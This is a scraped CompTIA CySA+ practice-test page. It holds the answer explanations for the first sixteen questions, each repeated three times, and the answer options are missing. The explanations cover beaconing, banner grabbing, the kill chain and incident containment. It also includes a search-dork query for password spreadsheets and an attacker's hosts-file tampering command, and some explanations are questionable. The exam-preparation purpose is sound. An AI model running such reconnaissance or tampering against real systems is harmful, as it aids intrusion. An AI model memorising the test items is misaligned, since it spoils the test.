You have already completed the Test before. Hence you can not start it again.
Test is loading...
You must sign in or sign up to start the Test.
You have to finish following quiz, to start this Test:
Your results are here!! for" CompTIA CySA+ (CS0-002) Practice Test 2 "
0 of 60 questions answered correctly
Your time:
Time has elapsed
Your Final Score is : 0
You have attempted : 0
Number of Correct Questions : 0 and scored 0
Number of Incorrect Questions : 0 and Negative marks 0
Average score
Your score
CompTIA CySA+ (CS0-002)
You have attempted: 0
Number of Correct Questions: 0 and scored 0
Number of Incorrect Questions: 0 and Negative marks 0
You can review your answers by clicking view questions. Important Note : Open Reference Documentation Links in New Tab (Right Click and Open in New Tab).
OBJ-3.3: The above example searches for files with the name “password” in them (q=password) and (+) have a filetype equal to xls (filetype%3Axls, %3A is the hex-code for ‘:’) and (+) limits the results to files hosted on skillcertprotraining.com (site%3Askillcertprotraining.com) and (&) disables personalization (pws=0) and (&) deactivates the directory filtering function (filter=p). If you wanted to exclude Microsoft Excel spreadsheets, this would be done by typing -filetype%3Axls as part of the search query. To find related websites or pages, you would include the “related:” term to the query. To deactivate all filters from the search, the “filter=0” should be used. To deactivate the directory filtering function, the “filter=p” is used.
Incorrect
OBJ-3.3: The above example searches for files with the name “password” in them (q=password) and (+) have a filetype equal to xls (filetype%3Axls, %3A is the hex-code for ‘:’) and (+) limits the results to files hosted on skillcertprotraining.com (site%3Askillcertprotraining.com) and (&) disables personalization (pws=0) and (&) deactivates the directory filtering function (filter=p). If you wanted to exclude Microsoft Excel spreadsheets, this would be done by typing -filetype%3Axls as part of the search query. To find related websites or pages, you would include the “related:” term to the query. To deactivate all filters from the search, the “filter=0” should be used. To deactivate the directory filtering function, the “filter=p” is used.
Unattempted
OBJ-3.3: The above example searches for files with the name “password” in them (q=password) and (+) have a filetype equal to xls (filetype%3Axls, %3A is the hex-code for ‘:’) and (+) limits the results to files hosted on skillcertprotraining.com (site%3Askillcertprotraining.com) and (&) disables personalization (pws=0) and (&) deactivates the directory filtering function (filter=p). If you wanted to exclude Microsoft Excel spreadsheets, this would be done by typing -filetype%3Axls as part of the search query. To find related websites or pages, you would include the “related:” term to the query. To deactivate all filters from the search, the “filter=0” should be used. To deactivate the directory filtering function, the “filter=p” is used.
Question 2 of 60
2. Question
A cybersecurity analyst has received an alert that sensors continuously observe well-known call home messages at their network boundary. Still, the organization’s proxy firewall is properly configured to successfully drop the messages before leaving the network. Which of the following is MOST likely the cause of the call home messages being sent?
Correct
OBJ-3.1: A call home message is an indicator of compromise known as beaconing. Beaconing usually occurs after a stage 1 malware program has been implanted on an organization’s workstation or server, but that isn’t the most correct answer to this question. Instead, beaconing indicates that a workstation or server is infected and tries to communicate with the attacker’s command and control server. This beaconing will continue until the infected system (workstation or server) is found and cleared of the malware or until the botnet gives the infected host further instructions to perform (such as to attack). “Malware is running on a company workstation or server” is incorrect because we do not have positive verification of that based on this scenario. A beacon does not have to be malware. For example, it can simply be a single ping packet or DNS request being sent out every day at a certain time using the Windows task scheduler. Be careful on the exam to answer the question being asked and choose the “most” accurate answer. Since the call home signal is coming from the internal network and attempting to connect to an external server, it cannot be evidence of an attacker performing reconnaissance on your workstations. Also, nothing in the question is indicative of an insider threat trying to exfiltrate information since a call home message is generally minimal in size and not large enough to exfiltrate data.
Incorrect
OBJ-3.1: A call home message is an indicator of compromise known as beaconing. Beaconing usually occurs after a stage 1 malware program has been implanted on an organization’s workstation or server, but that isn’t the most correct answer to this question. Instead, beaconing indicates that a workstation or server is infected and tries to communicate with the attacker’s command and control server. This beaconing will continue until the infected system (workstation or server) is found and cleared of the malware or until the botnet gives the infected host further instructions to perform (such as to attack). “Malware is running on a company workstation or server” is incorrect because we do not have positive verification of that based on this scenario. A beacon does not have to be malware. For example, it can simply be a single ping packet or DNS request being sent out every day at a certain time using the Windows task scheduler. Be careful on the exam to answer the question being asked and choose the “most” accurate answer. Since the call home signal is coming from the internal network and attempting to connect to an external server, it cannot be evidence of an attacker performing reconnaissance on your workstations. Also, nothing in the question is indicative of an insider threat trying to exfiltrate information since a call home message is generally minimal in size and not large enough to exfiltrate data.
Unattempted
OBJ-3.1: A call home message is an indicator of compromise known as beaconing. Beaconing usually occurs after a stage 1 malware program has been implanted on an organization’s workstation or server, but that isn’t the most correct answer to this question. Instead, beaconing indicates that a workstation or server is infected and tries to communicate with the attacker’s command and control server. This beaconing will continue until the infected system (workstation or server) is found and cleared of the malware or until the botnet gives the infected host further instructions to perform (such as to attack). “Malware is running on a company workstation or server” is incorrect because we do not have positive verification of that based on this scenario. A beacon does not have to be malware. For example, it can simply be a single ping packet or DNS request being sent out every day at a certain time using the Windows task scheduler. Be careful on the exam to answer the question being asked and choose the “most” accurate answer. Since the call home signal is coming from the internal network and attempting to connect to an external server, it cannot be evidence of an attacker performing reconnaissance on your workstations. Also, nothing in the question is indicative of an insider threat trying to exfiltrate information since a call home message is generally minimal in size and not large enough to exfiltrate data.
Question 3 of 60
3. Question
While conducting a security test to ensure that information about your company’s web server is protected from inadvertent disclosure, you request an HTML file from the webserver and receive the following output:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
HTTP/1.1 404 Object Not Found
Server: Microsoft-IIS/6.0
Date: Tuesday, 5 Sep 2017 1034:12 GMT
Content-Type: text/html
Content-Length: 132
There is no web site configured at this address.
This page is a placeholder until construction begins.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Which of the following actions should you take to remediate this vulnerability?
Correct
OBJ-1.7: This output is an example of banner grabbing being conducted against your web server. To prevent valuable information from being sent in the response, you should configure the “RemoveServerHeader” in the Microsoft IIS configuration file (URLScan.ini). If you set “RemoveServerHeader” to 1, UrlScan will remove the server header on all responses, and the value of AlternateServerName will be ignored. If you set “EnableLogging” to 1, UrlScan will log its actions in a file called UrlScan.log that will be created in the same directory that contains UrlScan.dll. If you set “PerProcessLogging” to 1, UrlScan will append the process ID of the IIS process that is hosting UrlScan.dll to the log file name; for example, UrlScan.1234.log. If you set “VerifyNormalization” to 1, UrlScan verifies the URL’s normalization and will defend against canonicalization attacks, where a URL contains a double encoded string in the URL. Please note, this question may seem beyond the scope of the exam. Still, the objectives allow for “other examples of technologies, processes, or tasks about each objective may also be included on the exam although not listed or covered” in the objectives’ bulletized lists. The exam tests the equivalent of 4 years of hands-on experience in a technical cybersecurity job role. The content examples listed in the objectives are meant to clarify the test objectives and should not be construed as a comprehensive listing of this examination’s complete content. Therefore, questions like this are fair game on test day. That said, your goal isn’t to score 100% on the exam; it is to pass it. Don’t let questions like this throw you off on test day. If you aren’t sure, take your best guess, and move on!
Incorrect
OBJ-1.7: This output is an example of banner grabbing being conducted against your web server. To prevent valuable information from being sent in the response, you should configure the “RemoveServerHeader” in the Microsoft IIS configuration file (URLScan.ini). If you set “RemoveServerHeader” to 1, UrlScan will remove the server header on all responses, and the value of AlternateServerName will be ignored. If you set “EnableLogging” to 1, UrlScan will log its actions in a file called UrlScan.log that will be created in the same directory that contains UrlScan.dll. If you set “PerProcessLogging” to 1, UrlScan will append the process ID of the IIS process that is hosting UrlScan.dll to the log file name; for example, UrlScan.1234.log. If you set “VerifyNormalization” to 1, UrlScan verifies the URL’s normalization and will defend against canonicalization attacks, where a URL contains a double encoded string in the URL. Please note, this question may seem beyond the scope of the exam. Still, the objectives allow for “other examples of technologies, processes, or tasks about each objective may also be included on the exam although not listed or covered” in the objectives’ bulletized lists. The exam tests the equivalent of 4 years of hands-on experience in a technical cybersecurity job role. The content examples listed in the objectives are meant to clarify the test objectives and should not be construed as a comprehensive listing of this examination’s complete content. Therefore, questions like this are fair game on test day. That said, your goal isn’t to score 100% on the exam; it is to pass it. Don’t let questions like this throw you off on test day. If you aren’t sure, take your best guess, and move on!
Unattempted
OBJ-1.7: This output is an example of banner grabbing being conducted against your web server. To prevent valuable information from being sent in the response, you should configure the “RemoveServerHeader” in the Microsoft IIS configuration file (URLScan.ini). If you set “RemoveServerHeader” to 1, UrlScan will remove the server header on all responses, and the value of AlternateServerName will be ignored. If you set “EnableLogging” to 1, UrlScan will log its actions in a file called UrlScan.log that will be created in the same directory that contains UrlScan.dll. If you set “PerProcessLogging” to 1, UrlScan will append the process ID of the IIS process that is hosting UrlScan.dll to the log file name; for example, UrlScan.1234.log. If you set “VerifyNormalization” to 1, UrlScan verifies the URL’s normalization and will defend against canonicalization attacks, where a URL contains a double encoded string in the URL. Please note, this question may seem beyond the scope of the exam. Still, the objectives allow for “other examples of technologies, processes, or tasks about each objective may also be included on the exam although not listed or covered” in the objectives’ bulletized lists. The exam tests the equivalent of 4 years of hands-on experience in a technical cybersecurity job role. The content examples listed in the objectives are meant to clarify the test objectives and should not be construed as a comprehensive listing of this examination’s complete content. Therefore, questions like this are fair game on test day. That said, your goal isn’t to score 100% on the exam; it is to pass it. Don’t let questions like this throw you off on test day. If you aren’t sure, take your best guess, and move on!
Question 4 of 60
4. Question
You are analyzing a Linux server that you suspect has been tampered with by an attacker. You went to the terminal and typed ‘history’ into the prompt and see the output:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
>echo 127.0.0.1 skillcertprotraining.com >> /etc/hosts
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Which of the following best describes what actions were performed by this line of code?
Correct
OBJ-3.1: Based on the output provided, it appears that the attacker has attempted to route all traffic destined for skillcertprotraining.com to the IP address specified (127.0.0.1). This is typically done to prevent a system from communicating with a specific domain to redirect a host to a malicious site. In this example, the IP/domain name pair of 127.0.0.1 and skillcertprotraining.com is being written to the /etc/hosts file. Modifying your hosts file enables you to override the domain name system (DNS) for a domain on a specific machine. The command echo >> redirects the output of the content on the left of the >> to the end of the file on the right of the >> symbol. If the > were used instead of >>, then this command would have overwritten the host file completely with this entry. The hosts file is not a system whitelist file.
Incorrect
OBJ-3.1: Based on the output provided, it appears that the attacker has attempted to route all traffic destined for skillcertprotraining.com to the IP address specified (127.0.0.1). This is typically done to prevent a system from communicating with a specific domain to redirect a host to a malicious site. In this example, the IP/domain name pair of 127.0.0.1 and skillcertprotraining.com is being written to the /etc/hosts file. Modifying your hosts file enables you to override the domain name system (DNS) for a domain on a specific machine. The command echo >> redirects the output of the content on the left of the >> to the end of the file on the right of the >> symbol. If the > were used instead of >>, then this command would have overwritten the host file completely with this entry. The hosts file is not a system whitelist file.
Unattempted
OBJ-3.1: Based on the output provided, it appears that the attacker has attempted to route all traffic destined for skillcertprotraining.com to the IP address specified (127.0.0.1). This is typically done to prevent a system from communicating with a specific domain to redirect a host to a malicious site. In this example, the IP/domain name pair of 127.0.0.1 and skillcertprotraining.com is being written to the /etc/hosts file. Modifying your hosts file enables you to override the domain name system (DNS) for a domain on a specific machine. The command echo >> redirects the output of the content on the left of the >> to the end of the file on the right of the >> symbol. If the > were used instead of >>, then this command would have overwritten the host file completely with this entry. The hosts file is not a system whitelist file.
Question 5 of 60
5. Question
Which of the following must be combined with a threat to create risk?
Correct
OBJ-1.2: A risk results from the combination of a threat and a vulnerability. A vulnerability is a weakness in a device, system, application, or process that might allow an attack to take place. A threat is an outside force that may exploit a vulnerability. Remember, a vulnerability is something internal to your organization’s security goals. Therefore, you can control, mitigate, or remediate a vulnerability. A threat is external to your organization’s security goals. A threat could be a malicious actor, a software exploit, a natural disaster, or other external factors. In the case of an insider threat, they are considered an external factor for threats and vulnerabilities since their goals lie outside your organization’s security goals.
Incorrect
OBJ-1.2: A risk results from the combination of a threat and a vulnerability. A vulnerability is a weakness in a device, system, application, or process that might allow an attack to take place. A threat is an outside force that may exploit a vulnerability. Remember, a vulnerability is something internal to your organization’s security goals. Therefore, you can control, mitigate, or remediate a vulnerability. A threat is external to your organization’s security goals. A threat could be a malicious actor, a software exploit, a natural disaster, or other external factors. In the case of an insider threat, they are considered an external factor for threats and vulnerabilities since their goals lie outside your organization’s security goals.
Unattempted
OBJ-1.2: A risk results from the combination of a threat and a vulnerability. A vulnerability is a weakness in a device, system, application, or process that might allow an attack to take place. A threat is an outside force that may exploit a vulnerability. Remember, a vulnerability is something internal to your organization’s security goals. Therefore, you can control, mitigate, or remediate a vulnerability. A threat is external to your organization’s security goals. A threat could be a malicious actor, a software exploit, a natural disaster, or other external factors. In the case of an insider threat, they are considered an external factor for threats and vulnerabilities since their goals lie outside your organization’s security goals.
Question 6 of 60
6. Question
Which of the following will an adversary so during the delivery phase of the Lockheed Martin kill chain? (SELECT THREE)
Correct
OBJ-1.2: During the delivery phase, the adversary is firing whatever exploits they have prepared during the weaponization phase. At this stage, they still do not have access to their target, though. Therefore, taking direct action against a public-facing web server, sending a spear-phishing email, placing a USB drive with malware, or starting a conversation on social media all fit within this phase. Internet-facing servers were enumerated during reconnaissance. Selecting a decoy document to present to the victim occurs during weaponization. Collecting press releases, contract awards, and conference attendee lists occur during the reconnaissance phase.
Incorrect
OBJ-1.2: During the delivery phase, the adversary is firing whatever exploits they have prepared during the weaponization phase. At this stage, they still do not have access to their target, though. Therefore, taking direct action against a public-facing web server, sending a spear-phishing email, placing a USB drive with malware, or starting a conversation on social media all fit within this phase. Internet-facing servers were enumerated during reconnaissance. Selecting a decoy document to present to the victim occurs during weaponization. Collecting press releases, contract awards, and conference attendee lists occur during the reconnaissance phase.
Unattempted
OBJ-1.2: During the delivery phase, the adversary is firing whatever exploits they have prepared during the weaponization phase. At this stage, they still do not have access to their target, though. Therefore, taking direct action against a public-facing web server, sending a spear-phishing email, placing a USB drive with malware, or starting a conversation on social media all fit within this phase. Internet-facing servers were enumerated during reconnaissance. Selecting a decoy document to present to the victim occurs during weaponization. Collecting press releases, contract awards, and conference attendee lists occur during the reconnaissance phase.
Question 7 of 60
7. Question
A cybersecurity analyst just finished conducting an initial vulnerability scan and is reviewing their results. To avoid wasting time on results that are not really a vulnerability, the analyst wants to remove any false positives before remediating the findings. Which of the following is an indicator that something in their results would be a false positive?
Correct
OBJ-1.3: When conducting a vulnerability scan, it is common for the report to include some findings that are classified as “low” priority or “for informational purposes only.” These are most likely false positives and can be ignored by the analyst when starting their remediation efforts. “An HTTPS entry that indicates the web page is securely encrypted” is not a false positive but a true negative (a non-issue). A scan result showing a different version from the automated asset inventory should be investigated and is likely a true positive. A finding that shows the scanner compliance plug-ins are not up-to-date would likely also be a true positive that should be investigated.
Incorrect
OBJ-1.3: When conducting a vulnerability scan, it is common for the report to include some findings that are classified as “low” priority or “for informational purposes only.” These are most likely false positives and can be ignored by the analyst when starting their remediation efforts. “An HTTPS entry that indicates the web page is securely encrypted” is not a false positive but a true negative (a non-issue). A scan result showing a different version from the automated asset inventory should be investigated and is likely a true positive. A finding that shows the scanner compliance plug-ins are not up-to-date would likely also be a true positive that should be investigated.
Unattempted
OBJ-1.3: When conducting a vulnerability scan, it is common for the report to include some findings that are classified as “low” priority or “for informational purposes only.” These are most likely false positives and can be ignored by the analyst when starting their remediation efforts. “An HTTPS entry that indicates the web page is securely encrypted” is not a false positive but a true negative (a non-issue). A scan result showing a different version from the automated asset inventory should be investigated and is likely a true positive. A finding that shows the scanner compliance plug-ins are not up-to-date would likely also be a true positive that should be investigated.
Question 8 of 60
8. Question
Your organization is updating its Acceptable User Policy (AUP) to implement a new password standard that requires a guest’s wireless devices to be sponsored before receiving authentication. Which of the following should be added to the AUP to support this new requirement?
Correct
OBJ-2.1: Sponsored authentication of guest wireless devices requires a guest user to provide valid identification when registering their wireless device for use on the network. This requires that an employee validates the guest’s need for access, known as sponsoring the guest. While setting a strong password or using 802.1x are good security practices, these alone do not meet the question’s sponsorship requirement. An open authentication standard only requires that the guest know the Service-Set Identifier (SSID) to gain access to the network. Therefore, this does not meet the sponsorship requirement.
Incorrect
OBJ-2.1: Sponsored authentication of guest wireless devices requires a guest user to provide valid identification when registering their wireless device for use on the network. This requires that an employee validates the guest’s need for access, known as sponsoring the guest. While setting a strong password or using 802.1x are good security practices, these alone do not meet the question’s sponsorship requirement. An open authentication standard only requires that the guest know the Service-Set Identifier (SSID) to gain access to the network. Therefore, this does not meet the sponsorship requirement.
Unattempted
OBJ-2.1: Sponsored authentication of guest wireless devices requires a guest user to provide valid identification when registering their wireless device for use on the network. This requires that an employee validates the guest’s need for access, known as sponsoring the guest. While setting a strong password or using 802.1x are good security practices, these alone do not meet the question’s sponsorship requirement. An open authentication standard only requires that the guest know the Service-Set Identifier (SSID) to gain access to the network. Therefore, this does not meet the sponsorship requirement.
Question 9 of 60
9. Question
What sanitization technique uses only logical techniques to remove data, such as overwriting a hard drive with a random series of ones and zeroes?
Correct
OBJ-2.1: Clear applies logical techniques to sanitize data in all user-addressable storage locations for protection against simple non-invasive data recovery techniques. Clearing involves overwriting data once (and seldom more than three times) with repetitive data (such as all zeros) or resetting a device to factory settings. Purging data is meant to eliminate information from being feasibly recovered even in a laboratory environment. Destroy requires physical destruction of the media, such as pulverization, melting, incineration, and disintegration. Degaussing is the process of decreasing or eliminating a remnant magnetic field. Degaussing is an effective method of sanitization for magnetic media, such as hard drives and floppy disks.
Incorrect
OBJ-2.1: Clear applies logical techniques to sanitize data in all user-addressable storage locations for protection against simple non-invasive data recovery techniques. Clearing involves overwriting data once (and seldom more than three times) with repetitive data (such as all zeros) or resetting a device to factory settings. Purging data is meant to eliminate information from being feasibly recovered even in a laboratory environment. Destroy requires physical destruction of the media, such as pulverization, melting, incineration, and disintegration. Degaussing is the process of decreasing or eliminating a remnant magnetic field. Degaussing is an effective method of sanitization for magnetic media, such as hard drives and floppy disks.
Unattempted
OBJ-2.1: Clear applies logical techniques to sanitize data in all user-addressable storage locations for protection against simple non-invasive data recovery techniques. Clearing involves overwriting data once (and seldom more than three times) with repetitive data (such as all zeros) or resetting a device to factory settings. Purging data is meant to eliminate information from being feasibly recovered even in a laboratory environment. Destroy requires physical destruction of the media, such as pulverization, melting, incineration, and disintegration. Degaussing is the process of decreasing or eliminating a remnant magnetic field. Degaussing is an effective method of sanitization for magnetic media, such as hard drives and floppy disks.
Question 10 of 60
10. Question
Which of the following options places the correct phases of the Software Development Lifecycle’s waterfall method in the correct order?
Correct
OBJ-2.2: The software development lifecycle (SDLC) can be conducted using waterfall or agile methods. The waterfall method moves through seven phases: planning, requirements, design, implementation, testing, deployment, and maintenance. Planning involves training the developers and testers in security issues, acquiring security analysis tools, and ensuring the development environment’s security. Requirements analysis is used to determine security and privacy needs in terms of data processing and access controls. Design identifies threats and controls or secure coding practices to meet the requirements. Implementation performs white box source code analysis and code reviews to identify and resolve vulnerabilities. Testing performs black box or grey box analysis to test for vulnerabilities in the published application and its publication environment. Deployment installs and operates the software packages and best practice configuration guides. Maintenance involves the ongoing security monitoring and incident response procedures, patch development and management, and other security controls. For a question like this on the real certification exam, you may be asked to drag and drop the seven steps into the proper order instead of receiving this as a multiple-choice question.
Incorrect
OBJ-2.2: The software development lifecycle (SDLC) can be conducted using waterfall or agile methods. The waterfall method moves through seven phases: planning, requirements, design, implementation, testing, deployment, and maintenance. Planning involves training the developers and testers in security issues, acquiring security analysis tools, and ensuring the development environment’s security. Requirements analysis is used to determine security and privacy needs in terms of data processing and access controls. Design identifies threats and controls or secure coding practices to meet the requirements. Implementation performs white box source code analysis and code reviews to identify and resolve vulnerabilities. Testing performs black box or grey box analysis to test for vulnerabilities in the published application and its publication environment. Deployment installs and operates the software packages and best practice configuration guides. Maintenance involves the ongoing security monitoring and incident response procedures, patch development and management, and other security controls. For a question like this on the real certification exam, you may be asked to drag and drop the seven steps into the proper order instead of receiving this as a multiple-choice question.
Unattempted
OBJ-2.2: The software development lifecycle (SDLC) can be conducted using waterfall or agile methods. The waterfall method moves through seven phases: planning, requirements, design, implementation, testing, deployment, and maintenance. Planning involves training the developers and testers in security issues, acquiring security analysis tools, and ensuring the development environment’s security. Requirements analysis is used to determine security and privacy needs in terms of data processing and access controls. Design identifies threats and controls or secure coding practices to meet the requirements. Implementation performs white box source code analysis and code reviews to identify and resolve vulnerabilities. Testing performs black box or grey box analysis to test for vulnerabilities in the published application and its publication environment. Deployment installs and operates the software packages and best practice configuration guides. Maintenance involves the ongoing security monitoring and incident response procedures, patch development and management, and other security controls. For a question like this on the real certification exam, you may be asked to drag and drop the seven steps into the proper order instead of receiving this as a multiple-choice question.
Question 11 of 60
11. Question
Jason is conducting an assessment of a network-enabled software platform that contains a published API. In reviewing the platform’s key management, he discovers that API keys are embedded in the source code for the application. Which of the following statements best describes the security flaw with this coding practice?
Correct
OBJ-2.2: A sophisticated adversary may discover the embedded key in the software through reverse engineering the source code. This inadvertent key disclosure could then allow an attacker to abuse the API in ways other than intended. Key management would still be required, even if the key is embedded in the source code. Permission levels of a software-embedded key are still controlled like any other key. While the added inconvenience of installing new software on the client side every time the key is changed would be inconvenient, this option does not address the underlying security issues with embedding API keys into the source code.
Incorrect
OBJ-2.2: A sophisticated adversary may discover the embedded key in the software through reverse engineering the source code. This inadvertent key disclosure could then allow an attacker to abuse the API in ways other than intended. Key management would still be required, even if the key is embedded in the source code. Permission levels of a software-embedded key are still controlled like any other key. While the added inconvenience of installing new software on the client side every time the key is changed would be inconvenient, this option does not address the underlying security issues with embedding API keys into the source code.
Unattempted
OBJ-2.2: A sophisticated adversary may discover the embedded key in the software through reverse engineering the source code. This inadvertent key disclosure could then allow an attacker to abuse the API in ways other than intended. Key management would still be required, even if the key is embedded in the source code. Permission levels of a software-embedded key are still controlled like any other key. While the added inconvenience of installing new software on the client side every time the key is changed would be inconvenient, this option does not address the underlying security issues with embedding API keys into the source code.
Question 12 of 60
12. Question
A recent threat has been announced in the cybersecurity world, stating a critical vulnerability in a particular operating system’s kernel. Unfortunately, your company has not maintained a current asset inventory, so you are unsure of how many of your servers may be affected. What should you do to find all of the affected servers within your network?
Correct
OBJ-1.4: By utilizing operating system fingerprinting using a tool like nmap, you can identify the servers running each version of an operating system. This will give you an accurate list of the possibly affected servers. Once you have this list, you can focus your attention on just those servers that need further inspection and scanning. Manually review the Syslog server’s log would take too long, and would not find servers that don’t send their logs to the Syslog server. Conducting a packet capture would only allow you to find the server actively transmitting data during the period of time you are capturing. Conducting a service discovery scan would not identify which servers are running which operating systems effectively. For example, if you see that the Apache web service is running on port 80, it doesn’t indicate running Linux or Windows as the underlying server.
Incorrect
OBJ-1.4: By utilizing operating system fingerprinting using a tool like nmap, you can identify the servers running each version of an operating system. This will give you an accurate list of the possibly affected servers. Once you have this list, you can focus your attention on just those servers that need further inspection and scanning. Manually review the Syslog server’s log would take too long, and would not find servers that don’t send their logs to the Syslog server. Conducting a packet capture would only allow you to find the server actively transmitting data during the period of time you are capturing. Conducting a service discovery scan would not identify which servers are running which operating systems effectively. For example, if you see that the Apache web service is running on port 80, it doesn’t indicate running Linux or Windows as the underlying server.
Unattempted
OBJ-1.4: By utilizing operating system fingerprinting using a tool like nmap, you can identify the servers running each version of an operating system. This will give you an accurate list of the possibly affected servers. Once you have this list, you can focus your attention on just those servers that need further inspection and scanning. Manually review the Syslog server’s log would take too long, and would not find servers that don’t send their logs to the Syslog server. Conducting a packet capture would only allow you to find the server actively transmitting data during the period of time you are capturing. Conducting a service discovery scan would not identify which servers are running which operating systems effectively. For example, if you see that the Apache web service is running on port 80, it doesn’t indicate running Linux or Windows as the underlying server.
Question 13 of 60
13. Question
An analyst reviews a triple-homed firewall configuration that connects to the internet, a private network, and one other network. Which of the following would best describe the third network connected to this firewall?
Correct
OBJ-3.2: A triple-homed firewall connects to three networks internal (private), external (internet/public), and the demilitarized zone (DMZ). The demilitarized zone (DMZ) network hosts systems that require access from external hosts. Group Policy Object (GPO) is a collection of Group Policy settings that defines what a system looks like and how it behaves for a defined group of users. A network intrusion detection system (NIDS) is a system that attempts to detect hacking activities, denial of service attacks, or port scans on a computer network or a computer itself. A subnet is a logical subdivision of an IP network.
Incorrect
OBJ-3.2: A triple-homed firewall connects to three networks internal (private), external (internet/public), and the demilitarized zone (DMZ). The demilitarized zone (DMZ) network hosts systems that require access from external hosts. Group Policy Object (GPO) is a collection of Group Policy settings that defines what a system looks like and how it behaves for a defined group of users. A network intrusion detection system (NIDS) is a system that attempts to detect hacking activities, denial of service attacks, or port scans on a computer network or a computer itself. A subnet is a logical subdivision of an IP network.
Unattempted
OBJ-3.2: A triple-homed firewall connects to three networks internal (private), external (internet/public), and the demilitarized zone (DMZ). The demilitarized zone (DMZ) network hosts systems that require access from external hosts. Group Policy Object (GPO) is a collection of Group Policy settings that defines what a system looks like and how it behaves for a defined group of users. A network intrusion detection system (NIDS) is a system that attempts to detect hacking activities, denial of service attacks, or port scans on a computer network or a computer itself. A subnet is a logical subdivision of an IP network.
Question 14 of 60
14. Question
Which of the following is NOT one of the main criteria included in a penetration testing plan?
Correct
OBJ-5.2: The three main criteria that should be included in a penetration testing plan are timing, scope, and authorization. Account credentials are usually provided during a white box test or vulnerability assessment, usually not provided for a penetration test.
Incorrect
OBJ-5.2: The three main criteria that should be included in a penetration testing plan are timing, scope, and authorization. Account credentials are usually provided during a white box test or vulnerability assessment, usually not provided for a penetration test.
Unattempted
OBJ-5.2: The three main criteria that should be included in a penetration testing plan are timing, scope, and authorization. Account credentials are usually provided during a white box test or vulnerability assessment, usually not provided for a penetration test.
Question 15 of 60
15. Question
Which of the following agreements is used between companies and employees, between companies and contractors, and between two companies to protect information assets?
Correct
OBJ-5.1: Non-disclosure agreement (NDA) is the legal basis for protecting information assets. NDAs are used between companies and employees, between companies and contractors, and between two companies. If the employee or contractor breaks this agreement and shares such information, they may face legal consequences. NDAs are useful because they deter employees and contractors from violating the trust that an employee places in them. An interconnection security agreement (ISA) is defined by NIST’s SP800-4 and is used by any federal agency interconnecting its IT system to a third party must create an ISA to govern the relationship. A service level agreement (SLA) is a contractual agreement that sets out the detailed terms under which a service is provided. A data sharing and use agreement (DSUA) states that personal data can only be collected for a specific purpose. A DSUA can specify how a dataset can be analyzed and proscribe the use of reidentification techniques.
Incorrect
OBJ-5.1: Non-disclosure agreement (NDA) is the legal basis for protecting information assets. NDAs are used between companies and employees, between companies and contractors, and between two companies. If the employee or contractor breaks this agreement and shares such information, they may face legal consequences. NDAs are useful because they deter employees and contractors from violating the trust that an employee places in them. An interconnection security agreement (ISA) is defined by NIST’s SP800-4 and is used by any federal agency interconnecting its IT system to a third party must create an ISA to govern the relationship. A service level agreement (SLA) is a contractual agreement that sets out the detailed terms under which a service is provided. A data sharing and use agreement (DSUA) states that personal data can only be collected for a specific purpose. A DSUA can specify how a dataset can be analyzed and proscribe the use of reidentification techniques.
Unattempted
OBJ-5.1: Non-disclosure agreement (NDA) is the legal basis for protecting information assets. NDAs are used between companies and employees, between companies and contractors, and between two companies. If the employee or contractor breaks this agreement and shares such information, they may face legal consequences. NDAs are useful because they deter employees and contractors from violating the trust that an employee places in them. An interconnection security agreement (ISA) is defined by NIST’s SP800-4 and is used by any federal agency interconnecting its IT system to a third party must create an ISA to govern the relationship. A service level agreement (SLA) is a contractual agreement that sets out the detailed terms under which a service is provided. A data sharing and use agreement (DSUA) states that personal data can only be collected for a specific purpose. A DSUA can specify how a dataset can be analyzed and proscribe the use of reidentification techniques.
Question 16 of 60
16. Question
You are notified by an external organization that an IP address associated with your company’s email server has been sending spam emails requesting funds as part of a lottery collection scam. An investigation into the incident reveals the email account used was Connor from the sales department and that Connor’s email account was only used from one workstation. You analyze Connor’s workstation and discover several unknown processes running, but netflow analysis reveals no attempted lateral movement to other workstations on the network. Which containment strategy would be most effective to use in this scenario?
Correct
OBJ-4.2: Isolation of Connor’s computer by deactivating the port on the switch should be performed instead of just unplugging the computer. This would guarantee that Connor won’t just plug the computer back into the network as soon as you leave his desk. While Connor won’t be able to work without his workstation, it is essential to isolate the issue quickly to prevent future attempts at lateral movement from occurring and protect the company’s data needed for continued business operations. While we are unsure of the issue’s initial root cause, we know it is currently isolated to Connor’s machine. He should receive remedial cybersecurity training, his workstation’s hard drive forensically imaged for later analysis, and then his workstation should be remediated or reimaged. It is better to isolate just Connor’s machine instead of the entire network segment in this scenario. Isolating the network segment, without evidence indicating the need to do so, would have been overkill and overly disruptive to the business. Reimaging Connor’s device may destroy data that could have otherwise been recovered and led to a successful root cause analysis. There is also insufficient evidence in this scenario to warrant disciplinary action against Connor, as he may have clicked on a malicious link by mistake.
Incorrect
OBJ-4.2: Isolation of Connor’s computer by deactivating the port on the switch should be performed instead of just unplugging the computer. This would guarantee that Connor won’t just plug the computer back into the network as soon as you leave his desk. While Connor won’t be able to work without his workstation, it is essential to isolate the issue quickly to prevent future attempts at lateral movement from occurring and protect the company’s data needed for continued business operations. While we are unsure of the issue’s initial root cause, we know it is currently isolated to Connor’s machine. He should receive remedial cybersecurity training, his workstation’s hard drive forensically imaged for later analysis, and then his workstation should be remediated or reimaged. It is better to isolate just Connor’s machine instead of the entire network segment in this scenario. Isolating the network segment, without evidence indicating the need to do so, would have been overkill and overly disruptive to the business. Reimaging Connor’s device may destroy data that could have otherwise been recovered and led to a successful root cause analysis. There is also insufficient evidence in this scenario to warrant disciplinary action against Connor, as he may have clicked on a malicious link by mistake.
Unattempted
